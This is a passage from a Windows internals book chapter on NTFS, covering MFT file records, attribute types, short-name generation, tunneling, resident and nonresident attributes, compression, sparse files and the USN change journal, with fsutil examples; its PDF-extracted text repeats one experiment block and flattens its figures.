Mft Zone End :
0x00000000069f7700
Max Device Trim Extent Count : 4294967295
Max Device Trim Byte Count :
0x10000000
Max Volume Trim Extent Count : 62
Max Volume Trim Byte Count :
0x10000000
Resource Manager Identifier :
81E83020-E6FB-11E8-B862-D89EF33A38A7
In this example, the D: volume uses 4 KB file records (MFT entries), on a 4 KB native sector size
disk (which emulates old 512-byte sectors) and uses 4 KB clusters.
CHAPTER 11
Caching and file systems
661
File records
Instead of viewing a file as just a repository for textual or binary data, NTFS stores files as a collection
of attribute/value pairs, one of which is the data it contains (called the unnamed data attribute). Other
attributes that compose a file include the file name, time stamp information, and possibly additional
named data attributes. Figure 11-34 illustrates an MFT record for a small file.
Master file table
Standard
information
File name
…
Data
FIGURE 11-34 MFT record for a small file.
Each file attribute is stored as a separate stream of bytes within a file. Strictly speaking, NTFS doesn’t
read and write files; it reads and writes attribute streams. NTFS supplies these attribute operations: cre-
ate, delete, read (byte range), and write (byte range). The read and write services normally operate on
the file’s unnamed data attribute. However, a caller can specify a different data attribute by using the
named data stream syntax.
Table 11-6 lists the attributes for files on an NTFS volume. (Not all attributes are present for every
file.) Each attribute in the NTFS file system can be unnamed or can have a name. An example of a
named attribute is the LOGGED_UTILITY_STREAM, which is used for various purposes by different
NTFS components. Table 11-7 lists the possible LOGGED_UTILITY_STREAM attribute’s names and their
respective purposes.
662
CHAPTER 11
Caching and file systems
TABLE 11-6 Attributes for NTFS files
Attribute
Attribute Type Name
Resident?
Description
Volume information
VOLUME_INFORMATION,
VOLUME_NAME
Always,
Always
These attributes are present only in the Volume
metadata file. They store volume version and label
information.
Standard information
STANDARD_INFORMATION
Always
File attributes such as read-only, archive, and so
on; time stamps, including when the file was cre-
ated or last modified.
File name
FILE_NAME
Maybe
The file’s name in Unicode 1.0 characters. A file
can have multiple file name attributes, as it does
when a hard link to a file exists or when a file with
a long name has an automatically generated short
name for access by MS-DOS and 16-bit Windows
applications.
Security descriptor
SECURITY_DESCRIPTOR
Maybe
This attribute is present for backward compat-
ibility with previous versions of NTFS and is rarely
used in the current version of NTFS (3.1). NTFS
stores almost all security descriptors in the Secure
metadata file, sharing descriptors among files and
directories that have the same settings. Previous
versions of NTFS stored private security descriptor
information with each file and directory. Some files
still include a SECURITY_DESCRIPTOR attribute,
such as Boot.
Data
DATA
Maybe
The contents of the file. In NTFS, a file has one
default unnamed data attribute and can have
additional named data attributes—that is, a file
can have multiple data streams. A directory has
no default data attribute but can have optional
named data attributes.
Named data streams can be used even for par-
ticular system purposes. For example, the Storage
Reserve Area Table (SRAT) stream (SRAT) is used
by the Storage Service for creating Space reserva-
tions on a volume. This attribute is applied only on
the Bitmap metadata file. Storage Reserves are
described later in this chapter.
Index root, index al-
location
INDEX_ROOT,
INDEX_ALLOCATION,
Always,
Never
Three attributes used to implement B-tree data
structures used by directories, security, quota, and
other metadata files.
Attribute list
ATTRIBUTE_LIST
Maybe
A list of the attributes that make up the file and the
file record number of the MFT entry where each
attribute is located. This attribute is present when
a file requires more than one MFT file record.
Index Bitmap
BITMAP
Maybe
This attribute is used for different purposes:
for nonresident directories (where an INDEX_
ALLOCATION always exists), the bitmap records
which 4 KB-sized index blocks are already in use
by the B-tree, and which are free for future use
as B-tree grows; In the MFT there is an unnamed
“Bitmap” attribute that tracks which MFT seg-
ments are in use, and which are free for future
use by new files or by existing files that require
more space.
CHAPTER 11
Caching and file systems
663
Attribute
Attribute Type Name
Resident?
Description
Object ID
OBJECT_ID
Always
A 16-byte identifier (GUID) for a file or directory.
The link-tracking service assigns object IDs to shell
shortcut and OLE link source files. NTFS provides
APIs so that files and directories can be opened
with their object ID rather than their file name.
Reparse information
REPARSE_POINT
Maybe
This attribute stores a file’s reparse point data.
NTFS junctions and mount points include this at-
tribute.
Extended attributes
EA, EA_INFORMATION
Maybe,
Always
Extended attributes are name/value pairs and
aren’t normally used but are provided for back-
ward compatibility with OS/2 applications.
Logged utility stream
LOGGED_UTILITY_STREAM
Maybe
This attribute type can be used for various purpos-
es by different NTFS components. See Table 11-7
for more details.
TABLE 11-7 LOGGED_UTILITY_STREAM attribute
Attribute
Attribute Type Name
Resident?
Description
Encrypted File
Stream
EFS
Maybe
EFS stores data in this attribute that’s used to
manage a file’s encryption, such as the encrypted
version of the key needed to decrypt the file and a
list of users who are authorized to access the file.
Online encryption
backup
EfsBackup
Maybe
The attribute is used by the EFS Online encryp-
tion to store chunks of the original encrypted
data stream.
Transactional
NTFSData
TXF_DATA
Maybe
When a file or directory becomes part of a trans-
action, TxF also stores transaction data in the
TXF_DATA attribute, such as the file’s unique
transaction ID.
Desired Storage
Class
DSC
Resident
The desired storage class is used for “pinning” a
file to a preferred storage tier. See the “NTFS sup-
port for tiered volumes” section for more details.
Table 11-6 shows attribute names; however, attributes actually correspond to numeric type codes,
which NTFS uses to order the attributes within a file record. The file attributes in an MFT record are
ordered by these type codes (numerically in ascending order), with some attribute types appearing
more than once—if a file has multiple data attributes, for example, or multiple file names. All possible
attribute types (and their names) are listed in the AttrDef metadata file.
Each attribute in a file record is identified with its attribute type code and has a value and an op-
tional name. An attribute’s value is the byte stream composing the attribute. For example, the value of
the FILE_NAME attribute is the file’s name; the value of the DATA attribute is whatever bytes the user
stored in the file.
Most attributes never have names, although the index-related attributes and the DATA attribute
often do. Names distinguish between multiple attributes of the same type that a file can include. For
example, a file that has a named data stream has two DATA attributes: an unnamed DATA attribute
storing the default unnamed data stream, and a named DATA attribute having the name of the alter-
nate stream and storing the named stream’s data.
664
CHAPTER 11
Caching and file systems
File names
Both NTFS and FAT allow each file name in a path to be as many as 255 characters long. File names can
contain Unicode characters as well as multiple periods and embedded spaces. However, the FAT file
system supplied with MS-DOS is limited to 8 (non-Unicode) characters for its file names, followed by
a period and a 3-character extension. Figure 11-35 provides a visual representation of the different file
namespaces Windows supports and shows how they intersect.
Windows Subsystem for Linux (WSL) requires the biggest namespace of all the application execu-
tion environments that Windows supports, and therefore the NTFS namespace is equivalent to the
WSL namespace. WSL can create names that aren’t visible to Windows and MS-DOS applications,
including names with trailing periods and trailing spaces. Ordinarily, creating a file using the large
POSIX namespace isn’t a problem because you would do that only if you intended WSL applications
to use that file.
"TrailingDots..."
"SameNameDifferentCase"
"samenamedifferentcase"
"TrailingSpaces "
Examples
"LongFileName"
"UnicodeName.Φ∆ΠΛ"
"File.Name.With.Dots"
"File.Name2.With.Dots"
"Name With Embedded Spaces"
".BeginningDot"
"EIGHTCHR.123"
"CASEBLND.TYP"
WSL
Windows
subsystem
MS-DOS–Windows
clients
FIGURE 11-35 Windows file namespaces.
The relationship between 32-bit Windows applications and MS-DOS and 16-bit Windows applica-
tions is a much closer one, however. The Windows area in Figure 11-35 represents file names that the
Windows subsystem can create on an NTFS volume but that MS-DOS and 16-bit Windows applications
can’t see. This group includes file names longer than the 8.3 format of MS-DOS names, those contain-
ing Unicode (international) characters, those with multiple period characters or a beginning period,
and those with embedded spaces. For compatibility reasons, when a file is created with such a name,
NTFS automatically generates an alternate, MS-DOS-style file name for the file. Windows displays these
short names when you use the /x option with the dir command.
The MS-DOS file names are fully functional aliases for the NTFS files and are stored in the same
directory as the long file names. The MFT record for a file with an autogenerated MS-DOS file name is
shown in Figure 11-36.
CHAPTER 11
Caching and file systems
665
Standard
information
NTFS
file name
MS-DOS
file name
Data
New file name
attribute
FIGURE 11-36 MFT file record with an MS-DOS file name attribute.
The NTFS name and the generated MS-DOS name are stored in the same file record and therefore
refer to the same file. The MS-DOS name can be used to open, read from, write to, or copy the file. If
a user renames the file using either the long file name or the short file name, the new name replaces
both the existing names. If the new name isn’t a valid MS-DOS name, NTFS generates another MS-DOS
name for the file. (Note that NTFS only generates MS-DOS-style file names for the first file name.)
Note Hard links are implemented in a similar way. When a hard link to a file is created, NTFS
adds another file name attribute to the file’s MFT file record, and adds an entry in the Index
Allocation attribute of the directory in which the new link resides. The two situations differ in
one regard, however. When a user deletes a file that has multiple names (hard links), the file
record and the file remain in place. The file and its record are deleted only when the last file
name (hard link) is deleted. If a file has both an NTFS name and an autogenerated MS-DOS
name, however, a user can delete the file using either name.
Here’s the algorithm NTFS uses to generate an MS-DOS name from a long file name. The algo-
rithm is actually implemented in the kernel function RtlGenerate8dot3Name and can change in future
Windows releases. The latter function is also used by other drivers, such as CDFS, FAT, and third-party
file systems:
1.
Remove from the long name any characters that are illegal in MS-DOS names, including spaces
and Unicode characters. Remove preceding and trailing periods. Remove all other embedded
periods, except the last one.
2.
Truncate the string before the period (if present) to six characters (it may already be six or fewer
because this algorithm is applied when any character that is illegal in MS-DOS is present in the
name). If it is two or fewer characters, generate and concatenate a four-character hex checksum
string. Append the string n (where n is a number, starting with 1, that is used to distinguish
different files that truncate to the same name). Truncate the string after the period (if present)
to three characters.
3.
Put the result in uppercase letters. MS-DOS is case-insensitive, and this step guarantees that
NTFS won’t generate a new name that differs from the old name only in case.
4.
If the generated name duplicates an existing name in the directory, increment the n string. If n
is greater than 4, and a checksum was not concatenated already, truncate the string before the
period to two characters and generate and concatenate a four-character hex checksum string.
666
CHAPTER 11
Caching and file systems
Table 11-8 shows the long Windows file names from Figure 11-35 and their NTFS-generated MS-DOS
versions. The current algorithm and the examples in Figure 11-35 should give you an idea of what NTFS-
generated MS-DOS-style file names look like.
Note Since Windows 8.1, by default all the NTFS nonbootable volumes have short
name generation disabled. You can disable short name generation even in older ver-
sion of Windows by setting HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\
NtfsDisable8dot3NameCreation in the registry to a DWORD value of 1 and restarting the
machine. This could potentially break compatibility with older applications, though.
TABLE 11-8 NTFS-generated file names
Windows Long Name
NTFS-Generated Short Name
LongFileName
LONGFI1
UnicodeName.FDPL
UNICOD1
File.Name.With.Dots
FILENA1.DOT
File.Name2.With.Dots
FILENA2.DOT
File.Name3.With.Dots
FILENA3.DOT
File.Name4.With.Dots
FILENA4.DOT
File.Name5.With.Dots
FIF5961.DOT
Name With Embedded Spaces
NAMEWI1
.BeginningDot
BEGINN1
25.two characters
2554401.TWO
©
6E2D1
Tunneling
NTFS uses the concept of tunneling to allow compatibility with older programs that depend on the file
system to cache certain file metadata for a period of time even after the file is gone, such as when it
has been deleted or renamed. With tunneling, any new file created with the same name as the original
file, and within a certain period of time, will keep some of the same metadata. The idea is to replicate
behavior expected by MS-DOS programs when using the safe save programming method, in which
modified data is copied to a temporary file, the original file is deleted, and then the temporary file is
renamed to the original name. The expected behavior in this case is that the renamed temporary file
should appear to be the same as the original file; otherwise, the creation time would continuously
update itself with each modification (which is how the modified time is used).
NTFS uses tunneling so that when a file name is removed from a directory, its long name and short
name, as well as its creation time, are saved into a cache. When a new file is added to a directory, the
cache is searched to see whether there is any tunneled data to restore. Because these operations apply
to directories, each directory instance has its own cache, which is deleted if the directory is removed.
CHAPTER 11
Caching and file systems
667
NTFS will use tunneling for the following series of operations if the names used result in the deletion
and re-creation of the same file name:
I
Delete + Create
I
Delete + Rename
I
Rename + Create
I
Rename + Rename
By default, NTFS keeps the tunneling cache for 15 seconds, although you can modify this time-
out by creating a new value called MaximumTunnelEntryAgeInSeconds in the HKLM\SYSTEM\
CurrentControlSet\Control\FileSystem registry key. Tunneling can also be completely disabled by
creating a new value called MaximumTunnelEntries and setting it to 0; however, this will cause older
applications to break if they rely on the compatibility behavior. On NTFS volumes that have short name
generation disabled (see the previous section), tunneling is disabled by default.
You can see tunneling in action with the following simple experiment in the command prompt:
1.
Create a file called file1.
2.
Wait for more than 15 seconds (the default tunnel cache timeout).
3.
Create a file called file2.
4.
Perform a dir /TC. Note the creation times.
5.
Rename file1 to file.
6.
Rename file2 to file1.
7.
Perform a dir /TC. Note that the creation times are identical.
Resident and nonresident attributes
If a file is small, all its attributes and their values (its data, for example) fit within the file record that
describes the file. When the value of an attribute is stored in the MFT (either in the file’s main file record
or an extension record located elsewhere within the MFT), the attribute is called a resident attribute.
(In Figure 11-37, for example, all attributes are resident.) Several attributes are defined as always being
resident so that NTFS can locate nonresident attributes. The standard information and index root at-
tributes are always resident, for example.
Each attribute begins with a standard header containing information about the attribute—informa-
tion that NTFS uses to manage the attributes in a generic way. The header, which is always resident,
records whether the attribute’s value is resident or nonresident. For resident attributes, the header also
contains the offset from the header to the attribute’s value and the length of the attribute’s value, as
Figure 11-37 illustrates for the file name attribute.
When an attribute’s value is stored directly in the MFT, the time it takes NTFS to access the value
is greatly reduced. Instead of looking up a file in a table and then reading a succession of allocation
668
CHAPTER 11
Caching and file systems
units to find the file’s data (as the FAT file system does, for example), NTFS accesses the disk once and
retrieves the data immediately.
Standard
information
File name
Data
“RESIDENT”
Offset: 8h
Length: 18h
Attribute header
Attribute value
MYFILE.DAT
FIGURE 11-37 Resident attribute header and value.
The attributes for a small directory, as well as for a small file, can be resident in the MFT, as Figure 11-38
shows. For a small directory, the index root attribute contains an index (organized as a B-tree) of file
record numbers for the files (and the subdirectories) within the directory.
Standard
information
File name
Index root
Index of files
file1, file2, file3, ...
Empty
FIGURE 11-38 MFT file record for a small directory.
Of course, many files and directories can’t be squeezed into a 1 KB or 4 KB, fixed-size MFT record. If a
particular attribute’s value, such as a file’s data attribute, is too large to be contained in an MFT file record,
NTFS allocates clusters for the attribute’s value outside the MFT. A contiguous group of clusters is called
a run (or an extent). If the attribute’s value later grows (if a user appends data to the file, for example),
NTFS allocates another run for the additional data. Attributes whose values are stored in runs (rather than
within the MFT) are called nonresident attributes. The file system decides whether a particular attribute is
resident or nonresident; the location of the data is transparent to the process accessing it.
When an attribute is nonresident, as the data attribute for a large file will certainly be, its header
contains the information NTFS needs to locate the attribute’s value on the disk. Figure 11-39 shows a
nonresident data attribute stored in two runs.
NTFS
extended
attributes
Standard
information File name
Data
Data
Data
FIGURE 11-39 MFT file record for a large file with two data runs.
CHAPTER 11
Caching and file systems
669
Among the standard attributes, only those that can grow can be nonresident. For files, the attributes
that can grow are the data and the attribute list (not shown in Figure 11-39). The standard information
and file name attributes are always resident.
A large directory can also have nonresident attributes (or parts of attributes), as Figure 11-40 shows.
In this example, the MFT file record doesn’t have enough room to store the B-tree that contains the
index of files that are within this large directory. A part of the index is stored in the index root attribute,
and the rest of the index is stored in nonresident runs called index allocations. The index root, index
allocation, and bitmap attributes are shown here in a simplified form. They are described in more detail
in the next section. The standard information and file name attributes are always resident. The header
and at least part of the value of the index root attribute are also resident for directories.
Index
allocation
Bitmap
Standard
information File name
Index root
Index buffers
file1 file2 file3
file5 file6
Index of files
file4
file8
FIGURE 11-40 MFT file record for a large directory with a nonresident file name index.
When an attribute’s value can’t fit in an MFT file record and separate allocations are needed, NTFS
keeps track of the runs by means of VCN-to-LCN mapping pairs. LCNs represent the sequence of
clusters on an entire volume from 0 through n. VCNs number the clusters belonging to a particular file
from 0 through m. For example, the clusters in the runs of a nonresident data attribute are numbered
as shown in Figure 11-41.
Standard
information
0
1
2
3
1355
1356
1357
1358
File name
Data
Data
Data
File 16
4
5
6
7
1588
1589
1590
1591
VCN
LCN
FIGURE 11-41 VCNs for a nonresident data attribute.
If this file had more than two runs, the numbering of the third run would start with VCN 8. As
Figure 11-42 shows, the data attribute header contains VCN-to-LCN mappings for the two runs here,
which allows NTFS to easily find the allocations on the disk.
670
CHAPTER 11
Caching and file systems
Standard
information
0
1
2
3
1355
1356
1357
1358
File name
Data
Data
Data
File 16
4
5
6
7
1588
1589
1590
1591
VCN
LCN
1355
1588
4
4
0
4
Starting
VCN
Starting
LCN
Number of
clusters
FIGURE 11-42 VCN-to-LCN mappings for a nonresident data attribute.
Although Figure 11-41 shows just data runs, other attributes can be stored in runs if there isn’t
enough room in the MFT file record to contain them. And if a particular file has too many attributes
to fit in the MFT record, a second MFT record is used to contain the additional attributes (or attribute
headers for nonresident attributes). In this case, an attribute called the attribute list is added. The at-
tribute list attribute contains the name and type code of each of the file’s attributes and the file number
of the MFT record where the attribute is located. The attribute list attribute is provided for those cases
where all of a file’s attributes will not fit within the file’s file record or when a file grows so large or so
fragmented that a single MFT record can’t contain the multitude of VCN-to-LCN mappings needed to
find all its runs. Files with more than 200 runs typically require an attribute list. In summary, attribute
headers are always contained within file records in the MFT, but an attribute’s value may be located
outside the MFT in one or more extents.
Data compression and sparse files
NTFS supports compression on a per-file, per-directory, or per-volume basis using a variant of the LZ77
algorithm, known as LZNT1. (NTFS compression is performed only on user data, not file system meta-
data.) In Windows 8.1 and later, files can also be compressed using a newer suite of algorithms, which
include LZX (most compact) and XPRESS (including using 4, 8, or 16K block sizes, in order of speed).
This type of compression, which can be used through commands such as the compact shell command (as
well as File Provder APIs), leverages the Windows Overlay Filter (WOF) file system filter driver (Wof.sys),
which uses an NTFS alternate data stream and sparse files, and is not part of the NTFS driver per se.
WOF is outside the scope of this book, but you can read more about it here: https://devblogs.microsoft.
com/oldnewthing/20190618-00/p102597.
You can tell whether a volume is compressed by using the Windows GetVolumeInformation function. To
retrieve the actual compressed size of a file, use the Windows GetCompressedFileSize function. Finally,
to examine or change the compression setting for a file or directory, use the Windows DeviceIoControl
function. (See the FSCTL_GET_COMPRESSION and FSCTL_SET_COMPRESSION file system control
codes.) Keep in mind that although setting a file’s compression state compresses (or decompresses) the
file right away, setting a directory’s or volume’s compression state doesn’t cause any immediate com-
pression or decompression. Instead, setting a directory’s or volume’s compression state sets a default
CHAPTER 11
Caching and file systems
671
compression state that will be given to all newly created files and subdirectories within that directory or
volume (although, if you were to set directory compression using the directory’s property page within
Explorer, the contents of the entire directory tree will be compressed immediately).
The following section introduces NTFS compression by examining the simple case of compress-
ing sparse data. The subsequent sections extend the discussion to the compression of ordinary files
and sparse files.
Note NTFS compression is not supported in DAX volumes or for encrypted files.
Compressing sparse data
Sparse data is often large but contains only a small amount of nonzero data relative to its size. A sparse
matrix is one example of sparse data. As described earlier, NTFS uses VCNs, from 0 through m, to enu-
merate the clusters of a file. Each VCN maps to a corresponding LCN, which identifies the disk location
of the cluster. Figure 11-43 illustrates the runs (disk allocations) of a normal, noncompressed file, includ-
ing its VCNs and the LCNs they map to.
0
1
2
3
1355
1356
1357
1358
Data
Data
4
5
6
7
1588
1589
1590
1591
Data
8
9
10
11
2033
2034
2035
2036
VCN
LCN
FIGURE 11-43 Runs of a noncompressed file.
This file is stored in three runs, each of which is 4 clusters long, for a total of 12 clusters. Figure 11-44
shows the MFT record for this file. As described earlier, to save space, the MFT record’s data attribute,
which contains VCN-to-LCN mappings, records only one mapping for each run, rather than one for
each cluster. Notice, however, that each VCN from 0 through 11 has a corresponding LCN associated
with it. The first entry starts at VCN 0 and covers 4 clusters, the second entry starts at VCN 4 and covers
4 clusters, and so on. This entry format is typical for a noncompressed file.
Standard
information File name
Data
1355
1588
4
4
0
2033
4
8
4
Starting
VCN
Starting
LCN
Number of
clusters
FIGURE 11-44 MFT record for a noncompressed file.
When a user selects a file on an NTFS volume for compression, one NTFS compression technique is
to remove long strings of zeros from the file. If the file’s data is sparse, it typically shrinks to occupy a
672
CHAPTER 11
Caching and file systems
fraction of the disk space it would otherwise require. On subsequent writes to the file, NTFS allocates
space only for runs that contain nonzero data.
Figure 11-45 depicts the runs of a compressed file containing sparse data. Notice that certain ranges
of the file’s VCNs (16–31 and 64–127) have no disk allocations.
0
15
133
Data
Data
Data
Data
VCN
LCN
134 135
136 137 138 139 140 141 142 143 144 145 146 147 148
32
47
193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208
48
63
96
97
98
99
100 101 102 103 104 105 106 107 108 109 110
111
128
143
324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339
FIGURE 11-45 Runs of a compressed file containing sparse data.
The MFT record for this compressed file omits blocks of VCNs that contain zeros and therefore have
no physical storage allocated to them. The first data entry in Figure 11-46, for example, starts at VCN 0
and covers 16 clusters. The second entry jumps to VCN 32 and covers 16 clusters.
Standard
information File name
Data
133
193
16
16
0
96
16
48
32
Starting
VCN
Starting
LCN
Number of
clusters
324
16
128
FIGURE 11-46 MFT record for a compressed file containing sparse data.
When a program reads data from a compressed file, NTFS checks the MFT record to determine
whether a VCN-to-LCN mapping covers the location being read. If the program is reading from an
unallocated “hole” in the file, it means that the data in that part of the file consists of zeros, so NTFS
returns zeros without further accessing the disk. If a program writes nonzero data to a “hole,” NTFS
quietly allocates disk space and then writes the data. This technique is very efficient for sparse file data
that contains a lot of zero data.
CHAPTER 11
Caching and file systems
673
Compressing nonsparse data
The preceding example of compressing a sparse file is somewhat contrived. It describes “compres-
sion” for a case in which whole sections of a file were filled with zeros, but the remaining data in the file
wasn’t affected by the compression. The data in most files isn’t sparse, but it can still be compressed by
the application of a compression algorithm.
In NTFS, users can specify compression for individual files or for all the files in a directory. (New
files created in a directory marked for compression are automatically compressed—existing files
must be compressed individually when programmatically enabling compression with FSCTL_SET_
COMPRESSION.) When it compresses a file, NTFS divides the file’s unprocessed data into compression
units 16 clusters long (equal to 128 KB for a 8 KB cluster, for example). Certain sequences of data in a file
might not compress much, if at all; so for each compression unit in the file, NTFS determines whether
compressing the unit will save at least 1 cluster of storage. If compressing the unit won’t free up at least
1 cluster, NTFS allocates a 16-cluster run and writes the data in that unit to disk without compressing
it. If the data in a 16-cluster unit will compress to 15 or fewer clusters, NTFS allocates only the number
of clusters needed to contain the compressed data and then writes it to disk. Figure 11-47 illustrates
the compression of a file with four runs. The unshaded areas in this figure represent the actual storage
locations that the file occupies after compression. The first, second, and fourth runs were compressed;
the third run wasn’t. Even with one noncompressed run, compressing this file saved 26 clusters of disk
space, or 41%.
0
15
19
VCN
LCN
20
21
22
16
31
23
24
25
26
27
28
29
30
32
47
112
97
98
99
100 101 102 103 104 105 106 107 108 109 110
111
48
63
113
114
115
116
117
118
119 120 121 122
Noncompressed data
Compressed data
Compressed data
Compressed data
Compressed data
Compressed data
Compressed data
FIGURE 11-47 Data runs of a compressed file.
Note Although the diagrams in this chapter show contiguous LCNs, a compression unit
need not be stored in physically contiguous clusters. Runs that occupy noncontiguous clus-
ters produce slightly more complicated MFT records than the one shown in Figure 11-47.
674
CHAPTER 11
Caching and file systems
When it writes data to a compressed file, NTFS ensures that each run begins on a virtual 16-cluster
boundary. Thus the starting VCN of each run is a multiple of 16, and the runs are no longer than 16 clus-
ters. NTFS reads and writes at least one compression unit at a time when it accesses compressed files.
When it writes compressed data, however, NTFS tries to store compression units in physically contigu-
ous locations so that it can read them all in a single I/O operation. The 16-cluster size of the NTFS com-
pression unit was chosen to reduce internal fragmentation: the larger the compression unit, the less the
overall disk space needed to store the data. This 16-cluster compression unit size represents a trade-off
between producing smaller compressed files and slowing read operations for programs that randomly
access files. The equivalent of 16 clusters must be decompressed for each cache miss. (A cache miss is
more likely to occur during random file access.) Figure 11-48 shows the MFT record for the compressed
file shown in Figure 11-47.
Standard
information File name
Data
19
23
4
8
0
97
16
32
16
Starting
VCN
Starting
LCN
Number of
clusters
113
10
48
FIGURE 11-48 MFT record for a compressed file.
One difference between this compressed file and the earlier example of a compressed file contain-
ing sparse data is that three of the compressed runs in this file are less than 16 clusters long. Reading
this information from a file’s MFT file record enables NTFS to know whether data in the file is com-
pressed. Any run shorter than 16 clusters contains compressed data that NTFS must decompress when
it first reads the data into the cache. A run that is exactly 16 clusters long doesn’t contain compressed
data and therefore requires no decompression.
If the data in a run has been compressed, NTFS decompresses the data into a scratch buffer and
then copies it to the caller’s buffer. NTFS also loads the decompressed data into the cache, which makes
subsequent reads from the same run as fast as any other cached read. NTFS writes any updates to the
file to the cache, leaving the lazy writer to compress and write the modified data to disk asynchro-
nously. This strategy ensures that writing to a compressed file produces no more significant delay than
writing to a noncompressed file would.
NTFS keeps disk allocations for a compressed file contiguous whenever possible. As the LCNs indi-
cate, the first two runs of the compressed file shown in Figure 11-47 are physically contiguous, as are
the last two. When two or more runs are contiguous, NTFS performs disk read-ahead, as it does with
the data in other files. Because the reading and decompression of contiguous file data take place asyn-
chronously before the program requests the data, subsequent read operations obtain the data directly
from the cache, which greatly enhances read performance.
CHAPTER 11
Caching and file systems
675
Sparse files
Sparse files (the NTFS file type, as opposed to files that consist of sparse data, as described earlier) are
essentially compressed files for which NTFS doesn’t apply compression to the file’s nonsparse data.
However, NTFS manages the run data of a sparse file’s MFT record the same way it does for compressed
files that consist of sparse and nonsparse data.
The change journal file
The change journal file, \Extend\UsnJrnl, is a sparse file in which NTFS stores records of changes to
files and directories. Applications like the Windows File Replication Service (FRS) and the Windows
Search service make use of the journal to respond to file and directory changes as they occur.
The journal stores change entries in the J data stream and the maximum size of the journal in the Max
data stream. Entries are versioned and include the following information about a file or directory change:
I
The time of the change
I
The reason for the change (see Table 11-9)
I
The file or directory’s attributes
I
The file or directory’s name
I
The file or directory’s MFT file record number
I
The file record number of the file’s parent directory
I
The security ID
I
The update sequence number (USN) of the record
I
Additional information about the source of the change (a user, the FRS, and so on)
TABLE 11-9 Change journal change reasons
Identifier
Reason
USN_REASON_DATA_OVERWRITE
The data in the file or directory was overwritten.
USN_REASON_DATA_EXTEND
Data was added to the file or directory.
USN_REASON_DATA_TRUNCATION
The data in the file or directory was truncated.
USN_REASON_NAMED_DATA_OVERWRITE
The data in a file’s data stream was overwritten.
USN_REASON_NAMED_DATA_EXTEND
The data in a file’s data stream was extended.
USN_REASON_NAMED_DATA_TRUNCATION
The data in a file’s data stream was truncated.
USN_REASON_FILE_CREATE
A new file or directory was created.
USN_REASON_FILE_DELETE
A file or directory was deleted.
USN_REASON_EA_CHANGE
The extended attributes for a file or directory changed.
USN_REASON_SECURITY_CHANGE
The security descriptor for a file or directory was changed.
USN_REASON_RENAME_OLD_NAME
A file or directory was renamed; this is the old name.
676
CHAPTER 11
Caching and file systems
Identifier
Reason
USN_REASON_RENAME_NEW_NAME
A file or directory was renamed; this is the new name.
USN_REASON_INDEXABLE_CHANGE
The indexing state for the file or directory was changed (whether or not
the Indexing service will process this file or directory).
USN_REASON_BASIC_INFO_CHANGE
The file or directory attributes and/or the time stamps were changed.
USN_REASON_HARD_LINK_CHANGE
A hard link was added or removed from the file or directory.
USN_REASON_COMPRESSION_CHANGE
The compression state for the file or directory was changed.
USN_REASON_ENCRYPTION_CHANGE
The encryption state (EFS) was enabled or disabled for this file or directory.
USN_REASON_OBJECT_ID_CHANGE
The object ID for this file or directory was changed.
USN_REASON_REPARSE_POINT_CHANGE
The reparse point for a file or directory was changed, or a new reparse point
(such as a symbolic link) was added or deleted from a file or directory.
USN_REASON_STREAM_CHANGE
A new data stream was added to or removed from a file or renamed.
USN_REASON_TRANSACTED_CHANGE
This value is added (ORed) to the change reason to indicate that the
change was the result of a recent commit of a TxF transaction.
USN_REASON_CLOSE
The handle to a file or directory was closed, indicating that this is the
final modification made to the file in this series of operations.
USN_REASON_INTEGRITY_CHANGE
The content of a file’s extent (run) has changed, so the associated in-
tegrity stream has been updated with a new checksum. This Identifier is
generated by the ReFS file system.
USN_REASON_DESIRED_STORAGE_
CLASS_CHANGE
The event is generated by the NTFS file system driver when a stream is
moved from the capacity to the performance tier or vice versa.
EXPERIMENT: Reading the change journal
You can use the built-in %SystemRoot%\System32\Fsutil.exe tool to create, delete, or query jour-
nal information with the built-in Fsutil.exe utility, as shown here:
d:\>fsutil usn queryjournal d:
Usn Journal ID : 0x01d48f4c3853cc72
First Usn
: 0x0000000000000000
Next Usn
: 0x0000000000000a60
Lowest Valid Usn : 0x0000000000000000
Max Usn
: 0x7fffffffffff0000
Maximum Size : 0x0000000000a00000
Allocation Delta : 0x0000000000200000
Minimum record version supported : 2
Maximum record version supported : 4
Write range tracking: Disabled
The output indicates the maximum size of the change journal on the volume (10 MB) and its
current state. As a simple experiment to see how NTFS records changes in the journal, create a
file called Usn.txt in the current directory, rename it to UsnNew.txt, and then dump the journal
with Fsutil, as shown here:
d:\>echo Hello USN Journal! > Usn.txt
d:\>ren Usn.txt UsnNew.txt
EXPERIMENT: Reading the change journal
You can use the built-in %SystemRoot%\System32\Fsutil.exe tool to create, delete, or query jour-
nal information with the built-in Fsutil.exe utility, as shown here:
d:\>fsutil usn queryjournal d:
Usn Journal ID : 0x01d48f4c3853cc72
First Usn
: 0x0000000000000000
Next Usn
: 0x0000000000000a60
Lowest Valid Usn : 0x0000000000000000
Max Usn
: 0x7fffffffffff0000
Maximum Size : 0x0000000000a00000
Allocation Delta : 0x0000000000200000
Minimum record version supported : 2
Maximum record version supported : 4
Write range tracking: Disabled
The output indicates the maximum size of the change journal on the volume (10 MB) and its
current state. As a simple experiment to see how NTFS records changes in the journal, create a
file called Usn.txt in the current directory, rename it to UsnNew.txt, and then dump the journal
with Fsutil, as shown here:
d:\>echo Hello USN Journal! > Usn.txt
d:\>ren Usn.txt UsnNew.txt
CHAPTER 11
Caching and file systems
677
d:\>fsutil usn readjournal d:
...
Usn
: 2656
File name
: Usn.txt
File name length : 14
Reason
: 0x00000100: File create
Time stamp
: 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
Usn
: 2736
File name
: Usn.txt
File name length : 14
Reason
: 0x00000102: Data extend | File create
Time stamp
: 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
Usn
: 2816
File name
: Usn.txt
File name length : 14
Reason
: 0x80000102: Data extend | File create | Close
Time stamp
: 12/8/2018 15:22:05
File attributes : 0x00000020: Archive
File ID
: 0000000000000000000c000000617912
Parent file ID : 00000000000000000018000000617ab6
Source info
: 0x00000000: *NONE*
Security ID
: 0
Major version : 3
Minor version : 0
Record length : 96
Usn
: 2896
File name
: Usn.txt
File name length : 14
Reason
